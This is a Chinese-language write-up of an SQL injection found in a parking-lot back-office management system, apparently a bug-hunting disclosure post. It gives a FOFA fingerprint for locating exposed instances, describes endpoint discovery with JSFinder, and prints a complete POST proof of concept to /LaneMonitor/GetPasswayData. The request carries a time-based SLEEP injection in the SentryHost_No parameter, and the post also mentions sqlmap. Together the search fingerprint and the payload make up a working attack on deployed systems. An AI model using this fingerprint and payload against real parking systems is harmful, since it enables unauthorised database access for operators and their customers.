记一次停车场后台管理系统漏洞挖掘

漏洞描述

停车场后台管理系统是一种专为停车场管理者设计的综合管理平台，旨在提供全面、高效、智能的停车场运营管理解决方案，系统利用现代信息技术，如物联网、大数据、云计算等，实现对停车场内车辆进出、车位管理、费用结算、安全监控等各个环节的自动化、智能化管理。该系统能够显著提升停车场的管理效率，降低运营成本，并为车主提供更加便捷、舒适的停车体验。停车场后台管理系统多接口存在SQL注入漏洞

 漏洞复现

FOFA:

icon_hash="938984120"

记录

因为这个登录框有个SQL注入，想着再挖挖其他的

JSFinder看一下接口，找到3个接口

查看/LaneMonitor/GetPasswayData接口,是一个这个页面

查询接口，尝试SQL注入

POC

POST /LaneMonitor/GetPasswayData HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

SentryHost_No=1';SELECT+SLEEP(4)#

延时4秒

sqlmap